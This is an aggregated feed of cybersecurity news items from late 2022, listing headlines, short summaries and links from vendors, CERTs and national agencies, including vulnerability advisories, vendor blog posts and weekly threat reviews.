https://www.akamai.com/blog/security-research/ransomware-attack-trends-in-apj
Your Employees Need High-Performance, Secure Internet Access (and Aren’t Getting It)
2022-12-01T11:13:36Z | 1669893216

Computers have become a core component of the modern company. Many employees spend most or all of their workdays on them, interacting with a variety of different pieces of software. To do their jobs, employees need high-performance, secure access to corporate networks and IT assets. This is true whether an employee is working from the... The post Your Employees Need High-Performance, Secure Internet Access (and Aren’t Getting It) appeared first on Cato Networks.

https://www.catonetworks.com/blog/your-employees-need-high-performance-secure-internet-access-and-arent-getting-it/
Riigiportaal eesti.ee avas uuenenud ettevõtja keskkonna
2022-12-01T04:08:44Z | 1669867724

Riigiportaalil www.eesti.ee on uuem ettevõtjatele suunatud keskkond, kuhu on koondatud ettevõtte oluline info ning enim kasutatavad teenused.

https://ria.ee/uudised/riigiportaal-eestiee-avas-uuenenud-ettevotja-keskkonna
Security Alert (A22-11-19): Multiple Vulnerabilities in Google Chrome
2022-12-01T04:00:00Z | 1669867200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Lansweeper lansweeper TicketTemplateActions.aspx GetTemplateAttachment directory traversal vulnerability
2022-12-01T00:00:00Z | 1669852800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1531
Lansweeper lansweeper AssetActions.aspx directory traversal vulnerability
2022-12-01T00:00:00Z | 1669852800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1528
Lansweeper lansweeper HdConfigActions.aspx altertextlanguages stored cross-site scripting vulnerability
2022-12-01T00:00:00Z | 1669852800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1532
Lansweeper lansweeper HelpdeskActions.aspx edittemplate directory traversal vulnerability
2022-12-01T00:00:00Z | 1669852800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1529
Lansweeper lansweeper KnowledgebasePageActions.aspx ImportArticles directory traversal vulnerability
2022-12-01T00:00:00Z | 1669852800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1530
Lansweeper lansweeper SanitizeHtml cross-site scripting (XSS) vulnerability
2022-12-01T00:00:00Z | 1669852800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1541
Cursos CERT.br: Agenda 2023
2022-11-30T18:50:00Z | 1669834200

Em 2023 o CERT.br ministrará turmas dos seguintes cursos: Overview of Creating and Managing Computer Security Incident Response Teams Foundations of Incident Management [NOVO CURSO] Advanced Topics in Incident Handling A agenda completa e mais informações sobre os cursos podem ser obtidas na página: https://cert.br/cursos/

https://cert.br/cursos/
Accidentally Crashing a Botnet
2022-11-30T15:00:00Z | 1669820400

As part of our research into the cryptomining botnet kmsdbot, we rendered it useless.

https://www.akamai.com/blog/security-research/kmsdbot-part-two-crashing-a-botnet
Security Alert (A22-11-18): Vulnerability in VMware Tools for Windows
2022-11-30T04:00:00Z | 1669780800

VMware has published a security advisory to address a vulnerability in VMware Tools for Windows.

https://www.govcert.gov.hk/en/alerts_detail.php
Os Melhores & As Maiores do Portugal Tecnológico 2022
2022-11-30T00:00:00Z | 1669766400

O Centro Nacional de Cibersegurança foi reconhecido com o prémio Setor na 16.ª edição dos Prémios Melhores & As Maiores do Portugal Tecnológico. Os prémios são atribuídos pela Exame Informática e pela VISÃO e destacam as personalidades, inovações, marcas e organizações que mais se distinguiram em Portugal nas áreas da ciência e tecnologia. O CNCS foi premiado, em grande medida, pelo trabalho desenvolvido a promover a literacia digital junto de cidadãos, escolas, empresas e organismos públicos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135737/os-melhores-as-maiores-do-portugal-tecnologico-2022
Hijacking service workers via DOM Clobbering
2022-11-29T14:00:02Z | 1669730402

In this post, we'll briefly review how service worker hijacking works, then introduce a variant that can be triggered via DOM clobbering thanks to a quirk in document.getElementById(). Understanding s

https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering
Expanding API Security Awareness at API World
2022-11-29T14:00:00Z | 1669730400

API security should be a primary concern for organizations. Learn about the three principles of APIs to help protect against attacks.

https://www.akamai.com/blog/security/expanding-api-security-awareness-at-api-world
Specialized Zero-Knowledge Proof failures
2022-11-29T12:30:56Z | 1669725056

Zero-knowledge (ZK) proofs are useful cryptographic tools that have seen an explosion of interest in recent years, largely due to their applications to cryptocurrency. The fundamental idea of a ZK proof is that a person with a secret piece of information (a cryptographic key, for instance) can prove something about the secret […]

https://blog.trailofbits.com/2022/11/29/specialized-zero-knowledge-proof-failures/
SASE is the Right Choice for Cyber Risk Management
2022-11-29T12:20:51Z | 1669724451

Cybersecurity is all about risk management. Companies are faced with numerous, diverse cyber threats, and the job of the corporate security team is to minimize the risk of a data breach, ransomware infection, or other costly and damaging security incident. Cybersecurity tools and solutions are designed to help companies to achieve this goal of managing... The post SASE is the Right Choice for Cyber Risk Management appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-is-the-right-choice-for-cyber-risk-management/
High Threat Security Alert (A22-11-17): Vulnerability in Microsoft Edge
2022-11-29T04:00:00Z | 1669694400

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Cibersegurança, Programa Europa Digital - convite à apresentação de propostas
2022-11-29T00:00:00Z | 1669680000

A Comissão Europeia, em nome do Centro Europeu de Competências Industriais, Tecnológicas e de Investigação em Cibersegurança, lançou um convite à apresentação de propostas no âmbito do Programa Europa Digital. Este convite prevê um investimento financeiro na ordem dos 176,5 milhões de euros com o objetivo de melhorar os instrumentos e infraestruturas para uma maior cooperação em matéria de cibersegurança.Este convite à submissão de propostas estará aberto até 15 de fevereiro de 2023.Os tópicos abertos à submissão de propostas são:•    Capacity building of Security Operation CentresDIGITAL-ECCC-2022-CYBER-03-SOC•    Uptake Of Innovative Cybersecurity SolutionsDIGITAL-ECCC-2022-CYBER-03-UPTAKE-CYBERSOLUTIONS•    EU Cybersecurity Resilience, Coordination and Cybersecurity RangesDIGITAL-ECCC-2022-CYBER-03-CYBER-RESILIENCE•    Deploying The Network Of National Coordination Centres With Member StatesDIGITAL-ECCC-2022-CYBER-03-NAT-COORDINATION•    Supporting The NIS Directive Implementation And National Cybersecurity StrategiesDIGITAL-ECCC-2022-CYBER-03-NIS-DIRECTIVE•    Securing 5G Strategic Digital Infrastructures And TechnologiesDIGITAL-ECCC-2022-CYBER-03-SEC-5G-INFRASTRUCTURE•    Testing and Certification CapabilitiesDIGITAL-ECCC-2022-CYBER-03-TEST-CERT-CAPABILTIES

https://dyn.cncs.gov.pt/pt/detalhe/art/135735/ciberseguranca-programa-europa-digital-convite-a-apresentacao-de-propostas
The National Cyber Security Centre Finland’s weekly review – 47/2022
2022-11-28T14:21:39Z | 1669645299

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 18–24 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-472022
The National Cyber Security Centre Finland’s weekly review – 47/2022
2022-11-28T14:21:39Z | 1669645299

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 18–24 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-472022
Enemy at the Gates: Analyzing Attacks on Financial Services
2022-11-28T11:00:00Z | 1669633200

Financial services is an often attacked vertical, but to what extent and how? This blog post will cover several security issues affecting this industry.

https://www.akamai.com/blog/security-research/analyzing-attacks-on-financial-services
Microsoft panustas läbi avaarenduse Bürokrati arendusse
2022-11-25T08:15:09Z | 1669364109

Eesti riik töötab partneritega välja virtuaalset assistenti Bürokratt. Eestikeelse lahenduse valmimisse panustas ka Microsoft.

https://ria.ee/uudised/microsoft-panustas-labi-avaarenduse-burokrati-arendusse
High Threat Security Alert (A22-11-16): Vulnerability in Google Chrome
2022-11-25T04:00:00Z | 1669348800

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Addressing Regulatory Compliance Challenges for the Distributed Enterprise
2022-11-24T13:43:34Z | 1669297414

Regulatory compliance is a major concern for many organizations. The risks and costs of non-compliance are numerous, including brand damage, regulatory penalties, and even the inability to perform business-critical activities, such as processing payment card data. Digital transformation and the evolution of the regulatory landscape can pose significant compliance challenges for organizations. In most cases,... The post Addressing Regulatory Compliance Challenges for the Distributed Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/addressing-regulatory-compliance-challenges-for-the-distributed-enterprise/
An Inside Look: Life Before and After Deploying a SASE Service
2022-11-23T20:59:10Z | 1669237150

The post An Inside Look: Life Before and After Deploying a SASE Service appeared first on Cato Networks.

https://www.catonetworks.com/resources/inside-look-life-before-and-after-deploying-sase/
Denial-of-service attacks are on the rise – the impact is minor
2022-11-23T09:13:19Z | 1669194799

The National Cyber Security Centre Finland (NCSC-FI) has been receiving increasing numbers of reports of denial-of-service attacks during the autumn. The report rate for October was higher than for the previous months. The reported denial-of-service attacks have only had minor effects on their targets.

https://www.kyberturvallisuuskeskus.fi/en/news/denial-service-attacks-are-rise-impact-minor
Denial-of-service attacks are on the rise – the impact is minor
2022-11-23T09:13:19Z | 1669194799

The National Cyber Security Centre Finland (NCSC-FI) has been receiving increasing numbers of reports of denial-of-service attacks during the autumn. The report rate for October was higher than for the previous months. The reported denial-of-service attacks have only had minor effects on their targets.

https://www.kyberturvallisuuskeskus.fi/en/news/denial-service-attacks-are-rise-impact-minor
Wartime Sparks Unpredictable Shifts in DDoS Targeting
2022-11-22T14:00:00Z | 1669125600

DDoS cyberattacks targeting European customers on the Akamai Prolexic platform are increasing worldwide, In response, Akamai unveiled its new DDoS solution.

https://www.akamai.com/blog/security/wartime-sparks-unpredictable-shifts-in-ddos-targeting
Manage Akamai Features at the Edge with EdgeWorkers and EdgeKV
2022-11-22T14:00:00Z | 1669125600

EdgeWorkers and EdgeKV lets you set feature flags that tailor content to different website visitors.

https://www.akamai.com/blog/developers/manage-akamai-features-with-edgeworkers-and-edgekv
Corsa Security Enables Terabit-Scale Traffic Inspection with Virtual Firewalls
2022-11-22T13:00:00Z | 1669122000

Enterprises and Service Providers can Easily and Quickly Increase Inspection Capacity to Meet 5G Bandwidth Needs Corsa Security announced today that it has added new capabilities to its Corsa Security Orchestrator (CSO) software so that network security professionals can quickly and easily scale inspection capacity to terabits of traffic. The development means enterprises and service […] The post Corsa Security Enables Terabit-Scale Traffic Inspection with Virtual Firewalls appeared first on Corsa Security.

https://www.corsa.com/2022/11/22/corsa-security-enables-terabit-scale-traffic-inspection-with-virtual-firewalls/
The National Cyber Security Centre Finland’s weekly review – 46/2022
2022-11-22T12:37:37Z | 1669120657

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 11–17 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-462022
The National Cyber Security Centre Finland’s weekly review – 46/2022
2022-11-22T12:37:37Z | 1669120657

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 11–17 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-462022
October cyber weather brought grey skies
2022-11-22T12:23:51Z | 1669119831

Sunny spells were rare in October cyber weather. We have received a few reports about ransomware. The number of reported denial-of-service attacks was much higher than usual. The information security of medical devices has been a hot topic in the United States, and the issue has also been recognised in Finland.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_10/2022
October cyber weather brought grey skies
2022-11-22T12:23:51Z | 1669119831

Sunny spells were rare in October cyber weather. We have received a few reports about ransomware. The number of reported denial-of-service attacks was much higher than usual. The information security of medical devices has been a hot topic in the United States, and the issue has also been recognised in Finland.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_10/2022
Callback technologies CBFS Filter handle_ioctl_83150 null pointer dereference vulnerability
2022-11-22T00:00:00Z | 1669075200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1647
Callback technologies CBFS Filter handle_ioctl_0x830a0_systembuffer null pointer dereference vulnerability
2022-11-22T00:00:00Z | 1669075200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1649
Callback technologies CBFS Filter handle_ioctl_8314C null pointer dereference vulnerability
2022-11-22T00:00:00Z | 1669075200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1648
Four Steps: Effective API Security Using a Digital Bonding Strategy
2022-11-21T14:00:00Z | 1669039200

Focus on API security as part of your digital bonding strategy, because APIs are already connecting your business activities.

https://www.akamai.com/blog/security/four-steps-effective-api-security-using-digital-bonding-strategy
How to Become a Successful CISO: Advice from Amit Spitzer, Cato Networks’ CISO
2022-11-21T13:37:31Z | 1669037851

Amit Spitzer, Cato Networks’ CISO, shares his tried and true methods for succeeding as a CISO, while simultaneously balancing both security needs and business requirements. After more than 15 years in security and IT, I can honestly recommend the CISO position to security or IT professionals who are looking for a demanding, yet satisfying, position.... The post How to Become a Successful CISO: Advice from Amit Spitzer, Cato Networks’ CISO appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-become-a-successful-ciso-advice-from-amit-spitzer/
Inquérito de avaliação pós-campanha do Mês Europeu da Cibersegurança
2022-11-21T00:00:00Z | 1668988800

Finalizado o Mês Europeu da Cibersegurança (ECSM), a Agência Europeia para a Cibersegurança (ENISA) apela à participação no inquérito pós-campanha. Este inquérito levará cerca de 15-20 minutos a responder, e pretende avaliar o impacto de campanhas de sensibilização para a cibersegurança na mudança de comportamento entre os cidadãos. A sua participação é fundamental. Para participar basta clicar aqui. 

https://dyn.cncs.gov.pt/pt/detalhe/art/135736/inquerito-de-avaliacao-pos-campanha-do-mes-europeu-da-ciberseguranca
2023. aastal lõppeb mitme olulise Microsoft tarkvara tootetugi
2022-11-20T09:39:48Z | 1668937188

Outlook 2013, Office 2013, Exchange Server 2013 ning Excel 2013 on vaid käputäis Microsofti programme ja tooteid, mille tehniline tugi järgmisel aastal lõppeb. Pärast tootetoe lõppu ei saa neid tarkvarasid turvaliseks pidada.

https://ria.ee/uudised/2023-aastal-loppeb-mitme-olulise-microsoft-tarkvara-tootetugi
Ummistusrünnakud häirivad veebilehtede ja teenuste tööd
2022-11-19T13:16:01Z | 1668863761

RIA küberintsidentide käsitlemise osakond CERT-EE monitooring tuvatas täna kell 10.14, et viie Eesti ettevõtte teenustes algasid tõrked. Nende seas oli ka Eesti Energia.

https://ria.ee/uudised/ummistusrunnakud-hairivad-veebilehtede-ja-teenuste-tood
Akamai Is Delighted to Partner with Teneo and Bytes Software Services
2022-11-18T14:00:00Z | 1668780000

Akamai?s partnerships with Teneo and Bytes Software Solutions help us to adapt, grow, and innovate in an ever-changing landscape.

https://www.akamai.com/blog/partners/2022/nov/akamai-partners-with-teneo-and-bytes-software-services
What?s New for Developers: November 2022
2022-11-17T14:00:00Z | 1668693600

Read about the EdgeGrid PHP client update, EdgeWorkers news, the Terraform Provider 3.0 release, and the new Build, Deliver & Secure video series.

https://www.akamai.com/blog/developers/whats-new-for-developers-november-2022
The 3 Worst Breaches of 2022 That You Should Know About (That Didn’t Get Much Press or Attention)
2022-11-17T12:37:26Z | 1668688646

As security professionals, we are inundated with news stories and articles about cyber attacks and breached companies. Sometimes, attacks become newsworthy because of the attacked company, for example when it’s a notable enterprise. Other times, the attack technique was so unique, that it deserves a headline of its own. In this blog post, we take... The post The 3 Worst Breaches of 2022 That You Should Know About (That Didn’t Get Much Press or Attention) appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-3-worst-breaches-of-2022-that-you-should-know-about-that-didnt-get-much-press-or-attention/
Security Alert (A22-11-14): Multiple Vulnerabilities in Cisco Identity Services Engine
2022-11-17T04:00:00Z | 1668657600

Cisco released a security advisory to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-11-15): Multiple Vulnerabilities in F5 Products
2022-11-17T04:00:00Z | 1668657600

F5 has published security advisories to address multiple vulnerabilities in BIG-IP and BIG-IQ devices.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-3086
2022-11-17T00:00:00Z | 1668643200

CWE-77: Command Injection Cradlepoint IBR600 NCOS versions prior to 6.5.0.160bc2e are vulnerable to shell escape which enables local attackers with non-superuser credentials to gain full, unrestrictive shell access which may allow an attacker to execute arbitrary code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-3086
SD-WAN Integration: Routing Traffic to Optimize Network Performance
2022-11-16T14:00:00Z | 1668607200

Optimize network performance with SD-WAN integration to automatically route traffic to the nearest Akamai Secure Internet Access point of presence.

https://www.akamai.com/blog/security/sd-wan-routing-traffic-optimize-network-performance
Highly Sophisticated Phishing Scams Are Abusing Holiday Sentiment
2022-11-16T10:00:00Z | 1668592800

The holiday season is around the corner, which means phishing season is too. Akamai Security Research details the new ways adversaries are abusing the holidays.

https://www.akamai.com/blog/security-research/sophisticated-phishing-scam-abusing-holiday-sentiment
Security Alert (A22-11-13): Multiple Vulnerabilities in Firefox
2022-11-16T04:00:00Z | 1668571200

Mozilla has published the advisories (MFSA2022-47 and MFSA2022-48) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai?s Perspective on November?s Patch Tuesday
2022-11-15T15:00:00Z | 1668524400

Every Patch Tuesday stirs up the community. See Akamai's November insights and recommendations on what to focus on, and patch, patch, patch!

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-november-2022
The National Cyber Security Centre Finland’s weekly review – 45/2022
2022-11-15T14:15:47Z | 1668521747

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 4–10 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-452022
The National Cyber Security Centre Finland’s weekly review – 45/2022
2022-11-15T14:15:47Z | 1668521747

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 4–10 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-452022
Tackle Your Cloud Challenges, One Scenario at a Time
2022-11-15T14:00:00Z | 1668520800

Forrester?s quick start cards cover 18 common issues with cloud migrations and operations, and suggest actions to mitigate each one.

https://www.akamai.com/blog/cloud/tackle-your-cloud-challenges-one-scenario-at-a-time
ABI compatibility in Python: How hard could it be?
2022-11-15T12:30:00Z | 1668515400

TL;DR: Trail of Bits has developed abi3audit, a new Python tool for checking Python packages for CPython application binary interface (ABI) violations. We’ve used it to discover hundreds of inconsistently and incorrectly tagged package distributions, each of which is a potential source of crashes and exploitable memory corruption due to undetected ABI differences. It’s publicly […]

https://blog.trailofbits.com/2022/11/15/python-wheels-abi-abi3audit/
Microsoft Office class attribute double-free vulnerability
2022-11-15T00:00:00Z | 1668470400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1591
IronNet Q3 Threat Intelligence Report
2022-11-14T20:10:34Z | 1668456634

In our Q3 Quarterly Threat Intelligence Report, IronNet analysts provide insight into cyber threat trends from July through September 2022. The report draws from telemetry provided by the IronNet Collective DefenseSM platform, including our network detection and response (NDR) solution IronDefense, communities in IronDome, and proactive threat intelligence feed IronRadar. Combining these insights with in-depth assessments by IronNet threat analysts, our Q3 report highlights key cybersecurity trends and developments from the quarter, including: A breakdown of command and control (C2) trends, including analyses of top countries, domain registrars, and cloud providers hosting malicious C2 servers, as tracked by IronRadar. Details into key IronNet observations during Q3, such as a lowering barrier to entry into the phishing-as-a-service market, the use of AnyDesk and other legitimate tools by ransomware groups, and attacks by threat actors exploiting organizations’ legacy network infrastructure.  Significant community findings of notable indicators found among participant environments in IronDome during Q3. In-depth assessments of Big 4 nation-state activity, detailing major attack trends by state-sponsored threat actors in Q3 and nation-state strategic objectives in cyber.

https://www.ironnet.com/resource-library/ironnet-q3-threat-intelligence-report
We’re streamers now
2022-11-14T13:30:23Z | 1668432623

Over the years, we’ve built many high-impact tools that we use for security reviews. You might know some of them, like Slither, Echidna, Amarna, Tealer, and test-fuzz. All of our tools are open source, and we love seeing the community benefit from them. But mastering our tools takes time and practice, and it’s easier if […]

https://blog.trailofbits.com/2022/11/14/livestream-workshop-fuzzing-echidna-slither/
Effective Zero-Day Threat Management Requires Cloud-Based Security
2022-11-14T12:52:04Z | 1668430324

Zero-day attacks are a growing threat to corporate cybersecurity. Instead of reusing existing malware and attack campaigns that are easily detected by legacy security solutions, cyber threat actors tune their malware to each campaign or even each target within an organization.  These zero-day attacks are more difficult and expensive to detect, creating strain on corporate... The post Effective Zero-Day Threat Management Requires Cloud-Based Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/effective-zero-day-threat-management-requires-cloud-based-security/
Cyber exercise for the financial sector: sharing best practices and lessons learned
2022-11-11T12:26:57Z | 1668169617

Joint sectoral desk exercises benefit and can be implemented in various kinds of organisations. The latest example comes from the financial sector where organisations practiced sharing information with each other and learned about the roles of different authorities in the event of cyber incidents.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-exercise-financial-sector-sharing-best-practices-and-lessons-learned
Cyber exercise for the financial sector: sharing best practices and lessons learned
2022-11-11T12:26:57Z | 1668169617

Joint sectoral desk exercises benefit and can be implemented in various kinds of organisations. The latest example comes from the financial sector where organisations practiced sharing information with each other and learned about the roles of different authorities in the event of cyber incidents.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-exercise-financial-sector-sharing-best-practices-and-lessons-learned
Security Alert (A22-11-12): Multiple Vulnerabilities in Microsoft Edge
2022-11-11T04:00:00Z | 1668139200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
SASE Vendor Selection: Should You Focus on Outcomes or Tools?
2022-11-10T16:01:41Z | 1668096101

Ever since the 1990s, IT has been dominated by appliance-centric architecture. But in 2015, Cato revolutionized this paradigm by envisioning networking and security delivered as a converged, cloud-native service. This evolution was not unlike the massive shift created by AWS’s global cloud service, which provided a new kind of infrastructure that supported scalability, resiliency, elasticity,... The post SASE Vendor Selection: Should You Focus on Outcomes or Tools? appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-vendor-selection-should-you-focus-on-outcomes-or-tools/
KmsdBot: The Attack and Mine Malware
2022-11-10T15:00:00Z | 1668092400

Akamai security research has observed a new malware: a cryptominer with dreams of DDoS functionality. Read about kmdsbot in this blog.

https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware
Evolving Digital Experiences at the Edge
2022-11-10T14:00:00Z | 1668088800

The modern application has evolved and shifted to the edge. This inevitable adoption is improving the digital experience for end users.

https://www.akamai.com/blog/developers/evolving-digital-experiences-at-the-edge
Look out! Divergent representations are everywhere!
2022-11-10T12:30:53Z | 1668083453

Trail of Bits recently published a blog post about a signed integer overflow in certain versions of SQLite that can enable arbitrary code execution and result in a denial of service. While working on proof-of-concept exploits for that vulnerability, we noticed that the compiler’s representation of an important integer variable is semantically […]

https://blog.trailofbits.com/2022/11/10/divergent-representations-variable-overflows-c-compiler/
Olukord küberruumis – oktoober 2022
2022-11-10T10:10:00Z | 1668075000

Oktoobris registreerisime 265 mõjuga intsidenti, mis on viimase poole aasta kõige kõrgem näitaja.

https://ria.ee/uudised/olukord-kuberruumis-oktoober-2022
Security Alert (A22-11-10): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-11-10T04:00:00Z | 1668052800

Apple has released iOS 16.1.1 and iPadOS 16.1.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-11-11): Multiple Vulnerabilities in Cisco Products
2022-11-10T04:00:00Z | 1668052800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Foxit Reader Optional Content Group use-after-free vulnerability
2022-11-10T00:00:00Z | 1668038400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1614
Foxit Reader openPlayer use-after-free vulnerability
2022-11-10T00:00:00Z | 1668038400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1602
Foxit Reader annotation destroy use-after-free vulnerability
2022-11-10T00:00:00Z | 1668038400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1601
Foxit Reader deletePages Field Calculate use-after-free vulnerability
2022-11-10T00:00:00Z | 1668038400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1600
Identify a safe website by its address
2022-11-09T14:25:04Z | 1668003904

When browsing websites and using email, it is important to keep a cool head in the face of all kinds of messages. In other words, you should never make rash decisions, even if you are promised incredible profits or threatened with the potential freezing of your bank account or false criminal charges. Identifying a safe website is not always simple, but with the help of this article, it becomes much easier! In the article, we break down the addresses of two websites and go through them bit by bit.

https://www.kyberturvallisuuskeskus.fi/en/news/identify-safe-website-its-address
Identify a safe website by its address
2022-11-09T14:25:04Z | 1668003904

When browsing websites and using email, it is important to keep a cool head in the face of all kinds of messages. In other words, you should never make rash decisions, even if you are promised incredible profits or threatened with the potential freezing of your bank account or false criminal charges. Identifying a safe website is not always simple, but with the help of this article, it becomes much easier! In the article, we break down the addresses of two websites and go through them bit by bit.

https://www.kyberturvallisuuskeskus.fi/en/news/identify-safe-website-its-address
On-Ramping Traffic to a Cloud-Based Secure Web Gateway
2022-11-09T14:00:00Z | 1668002400

Though cloud-based secure web gateways (SWGs) eliminate many problems, it?s important to select the right approach to on-ramping traffic based on use case and protection level.

https://www.akamai.com/blog/security/on-ramping-traffic-to-cloud-based-secure-web-gateway-part-1
Rolling blackouts will also affect the functioning of telecommunications networks and services
2022-11-09T12:54:19Z | 1667998459

Finland's transmission system operator Fingrid has announced that due to the current global situation, Finland should prepare for electricity scarcity and the possibility of power cuts caused by electricity shortages this winter. In this article, we provide information on how the potential rotating power outages, or rolling blackouts, would affect the functioning mobile connections, fixed broadband connections and television and radio services.

https://www.kyberturvallisuuskeskus.fi/en/news/rolling-blackouts-will-also-affect-functioning-telecommunications-networks-and-services
Rolling blackouts will also affect the functioning of telecommunications networks and services
2022-11-09T12:54:19Z | 1667998459

Finland's transmission system operator Fingrid has announced that due to the current global situation, Finland should prepare for electricity scarcity and the possibility of power cuts caused by electricity shortages this winter. In this article, we provide information on how the potential rotating power outages, or rolling blackouts, would affect the functioning mobile connections, fixed broadband connections and television and radio services.

https://www.kyberturvallisuuskeskus.fi/en/news/rolling-blackouts-will-also-affect-functioning-telecommunications-networks-and-services
The National Cyber Security Centre Finland’s weekly review – 44/2022
2022-11-09T12:00:07Z | 1667995207

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 28 October–3 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-442022
The National Cyber Security Centre Finland’s weekly review – 44/2022
2022-11-09T12:00:07Z | 1667995207

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 28 October–3 November 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-442022
High Threat Security Alert (A22-11-07): Multiple Vulnerabilities in Microsoft Products (November 2022)
2022-11-09T04:00:00Z | 1667966400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-11-08): Multiple Vulnerabilities in VMware Workspace ONE Assist
2022-11-09T04:00:00Z | 1667966400

VMware has published a security advisory to address multiple vulnerabilities in VMware Workspace ONE Assist.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-11-09): Multiple Vulnerabilities in Google Chrome
2022-11-09T04:00:00Z | 1667966400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Novo episódio disponível de “Comunicar Cibersegurança – o podcast do CNCS”
2022-11-09T00:00:00Z | 1667952000

Neste segundo episódio debate-se o Relatório Cibersegurança em Portugal, subordinado ao tema Economia, lançado pelo Observatório de Cibersegurança do CNCS no passado mês de maio. O Relatório em causa estuda a dimensão económica da cibersergurança, centrando-se em especial na problemática da cibersegurança nas empresas. Para falar dele, convidámos dois dos autores, Francisco Carballo Cruz e João Cerejeira da Universidade do Minho.Recorde-se que este é um espaço de discussão sobre temas que pretendem servir para a promoção e reflexão das matérias de interesse relacionadas com a cibersegurança. Para aceder clique aqui e encontrará a versão áudio e vídeo.

https://dyn.cncs.gov.pt/pt/detalhe/art/135734/novo-episodio-disponivel-de-comunicar-ciberseguranca-o-podcast-do-cncs
CDN Meets GDN: Akamai Partners with Macrometa
2022-11-08T14:00:00Z | 1667916000

The web needs a CDN; the cloud needs a GDN. What does that mean and why is it important for developers?

https://www.akamai.com/blog/cloud/cdn-meets-gdn-akamai-partners-macrometa
How to Make Auto-scaling a Reality in Virtual Firewalls
2022-11-08T13:00:00Z | 1667912400

With the ongoing challenge to increase inspection capacity and threat protection in the face of constantly changing network and security configurations, security teams need a new approach to protecting their private network traffic. On-premise virtual firewalls can provide the required flexibility, agility and scalability, since they have evolved to feature parity with their physical appliance counterparts. However, […] The post How to Make Auto-scaling a Reality in Virtual Firewalls appeared first on Corsa Security.

